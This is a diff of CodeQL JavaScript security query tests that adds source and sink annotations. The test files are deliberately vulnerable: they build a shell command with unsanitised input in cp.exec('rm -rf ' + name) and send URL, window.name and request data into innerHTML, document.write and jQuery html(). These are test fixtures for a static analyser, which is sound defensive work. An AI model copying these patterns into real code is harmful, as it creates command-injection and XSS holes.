+++ b/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/subLib2/compiled-file.ts
@@ -1,5 +1,5 @@
 var cp = require("child_process")
-export default function (name) {
- cp.exec("rm -rf " + name); // $ Alert - the "files" directory points to this file.
+export default function (name) { // $ Source
+ cp.exec("rm -rf " + name); // $ Alert Sink - the "files" directory points to this file.
 }
diff --git a/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/subLib2/special-file.js b/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/subLib2/special-file.js
index 67890f50fe82..853e144a0d62 100644
--- a/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/subLib2/special-file.js
+++ b/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/subLib2/special-file.js
@@ -1,5 +1,5 @@
 var cp = require("child_process")
-module.exports = function (name) {
- cp.exec("rm -rf " + name); // $ Alert - the "files" directory points to this file.
+module.exports = function (name) { // $ Source
+ cp.exec("rm -rf " + name); // $ Alert Sink - the "files" directory points to this file.
 };
\ No newline at end of file
diff --git a/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/subLib3/my-file.ts b/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/subLib3/my-file.ts
index 8a79d2d66a66..f28c157a5ead 100644
--- a/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/subLib3/my-file.ts
+++ b/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/subLib3/my-file.ts
@@ -1,5 +1,5 @@
 var cp = require("child_process")
-module.exports = function (name) {
- cp.exec("rm -rf " + name); // $ Alert - functions exported as part of a submodule are also flagged.
+module.exports = function (name) { // $ Source
+ cp.exec("rm -rf " + name); // $ Alert Sink - functions exported as part of a submodule are also flagged.
 };
diff --git a/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/subLib4/index.js b/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/subLib4/index.js
index 820349c5c62f..505f4e7af78a 100644
--- a/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/subLib4/index.js
+++ b/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/subLib4/index.js
@@ -3,6 +3,6 @@ const dispatch = { POST: require("./subsub"), }; -module.exports.foo = function (name, type) { +module.exports.foo = function (name, type) { // $ Source dispatch[type](name); }; diff --git a/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/subLib4/subsub.js b/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/subLib4/subsub.js index bc9e51562033..b8da58006c7c 100644 --- a/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/subLib4/subsub.js +++ b/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/subLib4/subsub.js @@ -1,5 +1,5 @@ const cp = require("child_process") module.exports = function (name) { - cp.exec("rm -rf " + name); // $ Alert - functions exported as part of a submodule are also flagged. + cp.exec("rm -rf " + name); // $ Alert Sink - functions exported as part of a submodule are also flagged. }; diff --git a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/addEventListener.js b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/addEventListener.js index 8d4a8cac6d0a..5c933dceff32 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/addEventListener.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/addEventListener.js @@ -1,13 +1,13 @@ -this.addEventListener('message', function(event) { +this.addEventListener('message', function(event) { // $ Source document.write(event.data); // $ Alert }) -this.addEventListener('message', function({data}) { +this.addEventListener('message', function({data}) { // $ Source document.write(data); // $ Alert }) function test() { - function foo(x, event, y) { + function foo(x, event, y) { // $ Source document.write(x.data); document.write(event.data); // $ Alert document.write(y.data); 
diff --git a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/angular-tempate-url.js b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/angular-tempate-url.js index 1b186b7db6a4..14d645d32c4f 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/angular-tempate-url.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/angular-tempate-url.js @@ -10,6 +10,6 @@ angular.module('myApp', []) } }); -addEventListener('message', (ev) => { +addEventListener('message', (ev) => { // $ Source Cookie.set("unsafe", ev.data); }); diff --git a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/classnames.js b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/classnames.js index 8cda29a4e952..0d9f2d9fad21 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/classnames.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/classnames.js @@ -7,7 +7,7 @@ function main() { document.body.innerHTML = `Hello`; // $ Alert document.body.innerHTML = `Hello`; // $ Alert document.body.innerHTML = `Hello`; // $ Alert - let unsafeStyle = classNames.bind({foo: window.name}); + let unsafeStyle = classNames.bind({foo: window.name}); // $ Source document.body.innerHTML = `Hello`; // $ Alert let safeStyle = classNames.bind({}); document.body.innerHTML = `Hello`; // $ Alert diff --git a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/clipboard.ts b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/clipboard.ts index abc11b06ea87..79970a0e1b77 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/clipboard.ts +++ b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/clipboard.ts 
@@ -5,7 +5,7 @@ function paste(e) { if (!clipboardData) return; const text = clipboardData.getData('text/plain'); - const html = clipboardData.getData('text/html'); + const html = clipboardData.getData('text/html'); // $ Source if (!text && !html) return; e.preventDefault(); @@ -40,7 +40,7 @@ $("#foo").bind('paste', (e) => { if (!clipboardData) return; const text = clipboardData.getData('text/plain'); - const html = clipboardData.getData('text/html'); + const html = clipboardData.getData('text/html'); // $ Source if (!text && !html) return; e.preventDefault(); @@ -68,7 +68,7 @@ async function getClipboardData(e: ClipboardEvent): Promise } if (e.clipboardData.types.includes('text/html')) { - const droppedHtml = e.clipboardData.getData('text/html'); + const droppedHtml = e.clipboardData.getData('text/html'); // $ Source const container = document.createElement('html'); container.innerHTML = droppedHtml; // $ Alert const imgs = container.getElementsByTagName('img'); @@ -95,7 +95,7 @@ async function getClipboardData(e: ClipboardEvent): Promise const { data, inputType, isComposing, dataTransfer } = e; if (!dataTransfer) return; - const html = dataTransfer.getData('text/html'); + const html = dataTransfer.getData('text/html'); // $ Source $("#id").html(html); // $ Alert }); })(); \ No newline at end of file diff --git a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/d3.js b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/d3.js index c84f169995cb..df6fd9f439f0 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/d3.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/d3.js @@ -1,7 +1,7 @@ const d3 = require('d3'); function getTaint() { - return window.name; + return window.name; // $ Source } function doSomething() { diff --git a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/dates.js b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/dates.js index 97363f790da1..20e71516a9f7 100644 
--- a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/dates.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/dates.js @@ -6,7 +6,7 @@ import dateformat from 'dateformat'; function main() { let time = new Date(); - let taint = decodeURIComponent(window.location.hash.substring(1)); + let taint = decodeURIComponent(window.location.hash.substring(1)); // $ Source document.body.innerHTML = `Time is ${dateFns.format(time, taint)}`; // $ Alert document.body.innerHTML = `Time is ${dateFnsEsm.format(time, taint)}`; // $ Alert @@ -27,7 +27,7 @@ import MomentAdapter from "@date-io/moment"; import DayJSAdapter from "@date-io/dayjs" function dateio() { - let taint = decodeURIComponent(window.location.hash.substring(1)); + let taint = decodeURIComponent(window.location.hash.substring(1)); // $ Source const dateFns = new DateFnsAdapter(); const luxon = new LuxonAdapter(); @@ -43,7 +43,7 @@ function dateio() { import { DateTime } from "luxon"; function luxon() { - let taint = decodeURIComponent(window.location.hash.substring(1)); + let taint = decodeURIComponent(window.location.hash.substring(1)); // $ Source document.body.innerHTML = `Time is ${DateTime.now().plus({years: 1}).toFormat(taint)}`; // $ Alert document.body.innerHTML = `Time is ${new DateTime().setLocale('fr').toFormat(taint)}`; // $ Alert @@ -51,7 +51,7 @@ function luxon() { } function dateio2() { - let taint = decodeURIComponent(window.location.hash.substring(1)); + let taint = decodeURIComponent(window.location.hash.substring(1)); // $ Source const moment = new MomentAdapter(); document.body.innerHTML = `Time is ${moment.addDays(moment.date("2020-06-21"), 1).format(taint)}`; // $ Alert diff --git a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/dragAndDrop.ts b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/dragAndDrop.ts index 2e3c92f36758..8371c4c49b91 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/dragAndDrop.ts 
+++ b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/dragAndDrop.ts @@ -5,7 +5,7 @@ function drop(e) { if (!dataTransfer) return; const text = dataTransfer.getData('text/plain'); - const html = dataTransfer.getData('text/html'); + const html = dataTransfer.getData('text/html'); // $ Source if (!text && !html) return; e.preventDefault(); @@ -40,7 +40,7 @@ $("#foo").bind('drop', (e) => { if (!dataTransfer) return; const text = dataTransfer.getData('text/plain'); - const html = dataTransfer.getData('text/html'); + const html = dataTransfer.getData('text/html'); // $ Source if (!text && !html) return; e.preventDefault(); @@ -68,7 +68,7 @@ async function getDropData(e: DragEvent): Promise> { } if (e.dataTransfer.types.includes('text/html')) { - const droppedHtml = e.dataTransfer.getData('text/html'); + const droppedHtml = e.dataTransfer.getData('text/html'); // $ Source const container = document.createElement('html'); container.innerHTML = droppedHtml; // $ Alert const imgs = container.getElementsByTagName('img'); diff --git a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/jquery.js b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/jquery.js index f81f545809fa..d025ace184c8 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/jquery.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/jquery.js @@ -1,5 +1,5 @@ function test() { - var tainted = document.location.search + var tainted = document.location.search // $ Source $(tainted); // OK - location.search starts with '?' $("body", tainted); @@ -15,7 +15,7 @@ function test() { elm.innerHTML = decodeURIComponent(window.location.search); // $ Alert elm.innerHTML = decodeURIComponent(window.location.toString()); // $ Alert - let hash = window.location.hash; + let hash = window.location.hash; // $ Source $(hash); // OK - start with '#' $(hash.substring(1)); // $ Alert 
diff --git a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/json-stringify.jsx b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/json-stringify.jsx index f9958ea20999..ae373dd4ea96 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/json-stringify.jsx +++ b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/json-stringify.jsx @@ -2,7 +2,7 @@ var express = require("express"); var app = express(); app.get("/some/path", function (req, res) { - const locale = req.param("locale"); + const locale = req.param("locale"); // $ Source const breadcrumbList = [ { "@type": "ListItem", diff --git a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/jwt-server.js b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/jwt-server.js index 74c96fdae902..86b4c3e8d3cb 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/jwt-server.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/jwt-server.js @@ -4,7 +4,7 @@ import jwt from "jsonwebtoken"; import { JSDOM } from "jsdom"; app.get('/some/path', function (req, res) { - var taint = req.param("wobble"); + var taint = req.param("wobble"); // $ Source jwt.verify(taint, 'my-secret-key', function (err, decoded) { new JSDOM(decoded.foo, { runScripts: "dangerously" }); // $ Alert diff --git a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/optionalSanitizer.js b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/optionalSanitizer.js index dcec3e388777..73088a45b5ef 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/optionalSanitizer.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/optionalSanitizer.js @@ -1,5 +1,5 @@ function test() { - var target = document.location.search + var target = document.location.search // $ Source $('myId').html(sanitize ? DOMPurify.sanitize(target) : target); 
@@ -23,7 +23,7 @@ function test() { } function badSanitizer() { - var target = document.location.search + var target = document.location.search // $ Source function sanitizeBad(x) { return x; // No sanitization; diff --git a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/pages/[id].jsx b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/pages/[id].jsx index b60ca27e0e47..69f66f07aa44 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/pages/[id].jsx +++ b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/pages/[id].jsx @@ -2,7 +2,7 @@ import { useRouter } from 'next/router' export default function Post(params) { const router = useRouter() - const { id } = router.query + const { id } = router.query // $ Source return ( <> @@ -22,8 +22,8 @@ export default function Post(params) { export async function getServerSideProps(context) { return { props: { - id: context.params.id || "", - q: context.query?.foobar || "", + id: context.params.id || "", // $ Source + q: context.query?.foobar || "", // $ Source } } } diff --git a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/react-native.js b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/react-native.js index 2e403f76ddae..432c9910a2d7 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/react-native.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/react-native.js @@ -4,7 +4,7 @@ import { WebView } from 'react-native'; var app = express(); app.get('/some/path', function(req, res) { - let tainted = req.param("code"); + let tainted = req.param("code"); // $ Source ; // $ Alert ; // $ Alert }); diff --git a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/react-use-state.js b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/react-use-state.js index 7bf77b18be10..2dbc2feb38fa 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/react-use-state.js 
+++ b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/react-use-state.js @@ -1,19 +1,19 @@ import { useState } from 'react'; function initialState() { - let [state, setState] = useState(window.name); + let [state, setState] = useState(window.name); // $ Source return
    ; // $ Alert } function setStateValue() { let [state, setState] = useState('foo'); - setState(window.name); + setState(window.name); // $ Source return
    ; // $ Alert } function setStateValueLazy() { let [state, setState] = useState('foo'); - setState(() => window.name); + setState(() => window.name); // $ Source return
    ; // $ Alert } @@ -22,7 +22,7 @@ function setStateValueLazy() { setState(prev => { document.body.innerHTML = prev; // $ Alert }) - setState(() => window.name); + setState(() => window.name); // $ Source } function setStateValueSafe() { diff --git a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/sanitiser.js b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/sanitiser.js index 3ece85044bb3..52ad850e0185 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/sanitiser.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/sanitiser.js @@ -13,7 +13,7 @@ function escapeAttr(s) { } function test() { - var tainted = window.name; + var tainted = window.name; // $ Source var elt = document.createElement(); elt.innerHTML = "" + escapeHtml(tainted) + ""; elt.innerHTML = "
    " + escapeAttr(tainted) + "
    "; // $ MISSING: Alert - not flagged - diff --git a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/stored-xss.js b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/stored-xss.js index 6ee44babf8bf..aadec44a9dfb 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/stored-xss.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/stored-xss.js @@ -1,6 +1,6 @@ (function() { - sessionStorage.setItem('session', document.location.search); - localStorage.setItem('local', document.location.search); + sessionStorage.setItem('session', document.location.search); // $ Source + localStorage.setItem('local', document.location.search); // $ Source $('myId').html(sessionStorage.getItem('session')); // $ Alert $('myId').html(localStorage.getItem('session')); diff --git a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/tainted-url-suffix-arguments.js b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/tainted-url-suffix-arguments.js index a823a6ce004f..7b0e5c4be3a0 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/tainted-url-suffix-arguments.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/tainted-url-suffix-arguments.js @@ -8,6 +8,6 @@ function foo(x, y, z) { } function bar() { - const url = window.location.href; + const url = window.location.href; // $ Source foo('safe', url, 'safe'); } diff --git a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/tooltip.jsx b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/tooltip.jsx index e1d26b45802d..0b181f836c46 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/tooltip.jsx +++ b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/tooltip.jsx @@ -3,7 +3,7 @@ import ReactDOM from 'react-dom'; import ReactTooltip from 'react-tooltip'; function tooltips() { - const source = window.name; + const source = window.name; // $ Source return 
@@ -19,6 +19,6 @@ function MyElement(props) { } function useMyElement() { - const source = window.name; + const source = window.name; // $ Source return source} />; } \ No newline at end of file diff --git a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/translate.js b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/translate.js index d57844a89f28..11adc4399376 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/translate.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/translate.js @@ -3,7 +3,7 @@ "own goal": "backpass", "fumble": "feint" }; - var target = document.location.search + var target = document.location.search // $ Source var searchParams = new URLSearchParams(target.substring(1)); $('original-term').html(searchParams.get('term')); // $ Alert diff --git a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/trusted-types.js b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/trusted-types.js index 34eae2dc6a5b..247fbe3315fb 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/trusted-types.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/trusted-types.js @@ -1,7 +1,7 @@ import * as lib from './trusted-types-lib'; const policy1 = trustedTypes.createPolicy('x', { createHTML: x => x }); // $ Alert -policy1.createHTML(window.name); +policy1.createHTML(window.name); // $ Source const policy2 = trustedTypes.createPolicy('x', { createHTML: x => 'safe' }); policy2.createHTML(window.name); @@ -10,4 +10,4 @@ const policy3 = trustedTypes.createPolicy('x', { createHTML: x => x }); policy3.createHTML('safe'); const policy4 = trustedTypes.createPolicy('x', { createHTML: lib.createHtml }); -policy4.createHTML(window.name); +policy4.createHTML(window.name); // $ Source 
diff --git a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/tst.js b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/tst.js index 6fb538bd1c1b..7709e095601f 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/tst.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/tst.js @@ -1,5 +1,5 @@ function test() { - var target = document.location.search + var target = document.location.search // $ Source $('myId').html(target) // $ Alert @@ -11,7 +11,7 @@ function test() { $('
    '); $('
    '); - let params = (new URL(document.location)).searchParams; + let params = (new URL(document.location)).searchParams; // $ Source $('name').html(params.get('name')); // $ Alert var searchParams = new URLSearchParams(target.substring(1)); @@ -21,10 +21,10 @@ function test() { function foo(target) { $('myId').html(target); // $ Alert } -foo(document.location.search); +foo(document.location.search); // $ Source function bar() { - return document.location.search; + return document.location.search; // $ Source } $('myId').html(bar()); // $ Alert @@ -50,12 +50,12 @@ $('myId').html(wrap(chop(bar()))); // $ Alert function dangerouslySetInnerHtml(s) { $('myId').html(s); // $ Alert } -dangerouslySetInnerHtml(document.location.search); -dangerouslySetInnerHtml(document.location.search); +dangerouslySetInnerHtml(document.location.search); // $ Source +dangerouslySetInnerHtml(document.location.search); // $ Source $('myId').html(bar()); // $ Alert -[,document.location.search].forEach(function(x) { +[,document.location.search].forEach(function(x) { // $ Source if (x) $('myId').html(x); // $ Alert }); @@ -90,7 +90,7 @@ angular.module('myApp', []) }) function tst() { - var v = document.location.search.substr(1); + var v = document.location.search.substr(1); // $ Source document.write(v); // $ Alert @@ -129,7 +129,7 @@ function tst() { function angularJSServices() { angular.module('myApp', []) .factory("xssSource_to_service", ["xssSinkService1", function(xssSinkService1) { - xssSinkService1(window.location.search); + xssSinkService1(window.location.search); // $ Source }]) .factory("xssSinkService1", function(){ return function(v){ $("
    ").html(v); } // $ Alert @@ -139,7 +139,7 @@ function angularJSServices() { $("
    ").html(xssSourceService()); // $ Alert }]) .factory("xssSourceService", function(){ - return function() { return window.location.search }; + return function() { return window.location.search }; // $ Source }) .factory("innocentSource_to_service", ["xssSinkService2", function(xssSinkService2) { @@ -158,14 +158,14 @@ function angularJSServices() { } function testDOMParser() { - var target = document.location.search + var target = document.location.search // $ Source var parser = new DOMParser(); parser.parseFromString(target, "application/xml"); // $ Alert } function references() { - var tainted = document.location.search; + var tainted = document.location.search; // $ Source document.body.innerHTML = tainted; // $ Alert @@ -178,7 +178,7 @@ function references() { } function react(){ - var tainted = document.location.search; + var tainted = document.location.search; // $ Source React.createElement("div", {dangerouslySetInnerHTML: {__html: tainted}}); // $ Alert React.createFactory("div")({dangerouslySetInnerHTML: {__html: tainted}}); // $ Alert @@ -266,7 +266,7 @@ function jqueryLocation() { function testCreateContextualFragment() { - var tainted = window.name; + var tainted = window.name; // $ Source var range = document.createRange(); range.selectNode(document.getElementsByTagName("div").item(0)); var documentFragment = range.createContextualFragment(tainted); // $ Alert @@ -282,14 +282,14 @@ function flowThroughPropertyNames() { function basicExceptions() { try { - throw location; + throw location; // $ Source } catch(e) { $("body").append(e); // $ Alert } try { try { - throw location + throw location // $ Source } finally {} } catch(e) { $("body").append(e); // $ Alert @@ -308,7 +308,7 @@ function test2() { } function getTaintedUrl() { - return new URL(document.location); + return new URL(document.location); // $ Source } function URLPseudoProperties() { 
@@ -322,21 +322,21 @@ function URLPseudoProperties() { function hash() { function getUrl() { - return new URL(document.location); + return new URL(document.location); // $ Source } $(getUrl().hash.substring(1)); // $ Alert } function growl() { - var target = document.location.search + var target = document.location.search // $ Source $.jGrowl(target); // $ Alert } function thisNodes() { var pluginName = "myFancyJQueryPlugin"; var myPlugin = function () { - var target = document.location.search + var target = document.location.search // $ Source this.html(target); // $ Alert - this is a jQuery object this.innerHTML = target // OK - this is a jQuery object @@ -352,7 +352,7 @@ function thisNodes() { } function test() { - var target = document.location.search + var target = document.location.search // $ Source $('myId').html(target) // $ Alert @@ -361,7 +361,7 @@ function test() { } function test() { - var target = document.location.search + var target = document.location.search // $ Source $('myId').html(target); // $ Alert @@ -371,7 +371,7 @@ function test() { target.taint2 = 2; $('myId').html(target.taint2); - target.taint3 = document.location.search; + target.taint3 = document.location.search; // $ Source $('myId').html(target.taint3); // $ Alert target.sub.taint4 = 2 @@ -396,10 +396,10 @@ function test() { } function hash2() { - var payload = window.location.hash.substr(1); + var payload = window.location.hash.substr(1); // $ Source document.write(payload); // $ Alert - let match = window.location.hash.match(/hello (\w+)/); + let match = window.location.hash.match(/hello (\w+)/); // $ Source if (match) { document.write(match[1]); // $ Alert } @@ -408,7 +408,7 @@ function hash2() { } function nonGlobalSanitizer() { - var target = document.location.search + var target = document.location.search // $ Source $("#foo").html(target.replace(/[\s\S]*<\/metadata>/, '')); // $ Alert 
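Review bot: In `hash2` (hunk at -396) the new `// $ Source` on `window.location.hash.match(/hello (\w+)/)` pins a flow whose sink, `document.write(match[1])`, can only receive the `\w+` capture, so no markup can reach the document through it. If the alert stays an expected result because the analysis does not model capture groups, the sink line should say so with the marker these tests already use for known false positives: `document.write(match[1]); // $ SPURIOUS: Alert - capture group is \w+ only`. The `substr(1)` flow just above it is a genuine one and needs no change. `hash2` continues past the end of the hunk.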
@@ -416,7 +416,7 @@ function nonGlobalSanitizer() { } function mootools(){ - var source = document.location.search; + var source = document.location.search; // $ Source new Element("div"); new Element("div", {text: source}); @@ -433,14 +433,14 @@ const Convert = require('ansi-to-html'); const ansiToHtml = new Convert(); function ansiToHTML() { - var source = document.location.search; + var source = document.location.search; // $ Source $("#foo").html(source); // $ Alert $("#foo").html(ansiToHtml.toHtml(source)); // $ Alert } function domMethods() { - var source = document.location.search; + var source = document.location.search; // $ Source let table = document.getElementById('mytable'); table.innerHTML = source; // $ Alert @@ -451,7 +451,7 @@ function domMethods() { } function urlStuff() { - var url = document.location.search.substr(1); + var url = document.location.search.substr(1); // $ Source $("", {href: url}).appendTo("body"); // $ Alert $("#foo").attr("href", url); // $ Alert @@ -488,7 +488,7 @@ function Foo() { } function nonGlobalSanitizer() { - var target = document.location.search + var target = document.location.search // $ Source $("#foo").html(target.replace(new RegExp("<|>"), '')); // $ Alert $("#foo").html(target.replace(new RegExp("<|>", unknownFlags()), '')); // OK - most likely good. We don't know what the flags are. $("#foo").html(target.replace(new RegExp("<|>", "g"), '')); diff --git a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/tst3.js b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/tst3.js index 16932da72c05..eb1074a5a62f 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/tst3.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/tst3.js 
@@ -1,5 +1,5 @@ var foo = document.getElementById("foo"); -var data = JSON.parse(decodeURIComponent(window.location.search.substr(1))); +var data = JSON.parse(decodeURIComponent(window.location.search.substr(1))); // $ Source foo.setAttribute("src", data.src); // $ Alert foo.setAttribute("HREF", data.p); // $ Alert diff --git a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/typeahead.js b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/typeahead.js index a1302d196a7f..a3694f3cf79e 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/typeahead.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/typeahead.js @@ -17,7 +17,7 @@ { name: 'dashboards', source: function (query, cb) { - var target = document.location.search + var target = document.location.search // $ Source cb(target); }, templates: { diff --git a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/various-concat-obfuscations.js b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/various-concat-obfuscations.js index 957fe1ba0497..866636f07c18 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/various-concat-obfuscations.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/various-concat-obfuscations.js @@ -1,5 +1,5 @@ function test() { - let tainted = document.location.search; + let tainted = document.location.search; // $ Source $("
    " + tainted + "
    "); // $ Alert $(`
    ${tainted}
    `); // $ Alert diff --git a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/winjs.js b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/winjs.js index f52cb62735fb..5d2b25bed092 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/winjs.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/winjs.js @@ -1,5 +1,5 @@ function test(elt) { - var tainted = document.location.search.substring(1); + var tainted = document.location.search.substring(1); // $ Source WinJS.Utilities.setInnerHTMLUnsafe(elt, tainted); // $ Alert WinJS.Utilities.setOuterHTMLUnsafe(elt, tainted); // $ Alert } diff --git a/javascript/ql/test/query-tests/Security/CWE-079/ExceptionXss/exception-xss.js b/javascript/ql/test/query-tests/Security/CWE-079/ExceptionXss/exception-xss.js index f8a3d5c09486..c330177d56a3 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/ExceptionXss/exception-xss.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/ExceptionXss/exception-xss.js @@ -1,5 +1,5 @@ (function () { - var foo = document.location; + var foo = document.location; // $ Source function inner(x) { unknown(x); @@ -114,7 +114,7 @@ var app = express(); app.get('/user/:id', function (req, res) { try { - unknown(req.params.id); + unknown(req.params.id); // $ Source } catch (e) { res.send("Exception: " + e); // $ Alert } @@ -122,7 +122,7 @@ app.get('/user/:id', function (req, res) { (function () { - sessionStorage.setItem('exceptionSession', document.location.search); + sessionStorage.setItem('exceptionSession', document.location.search); // $ Source try { unknown(sessionStorage.getItem('exceptionSession')); @@ -133,7 +133,7 @@ app.get('/user/:id', function (req, res) { app.get('/user/:id', function (req, res) { - unknown(req.params.id, (error, res) => { + unknown(req.params.id, (error, res) => { // $ Source if (error) { $('myId').html(error); // $ Alert return; 
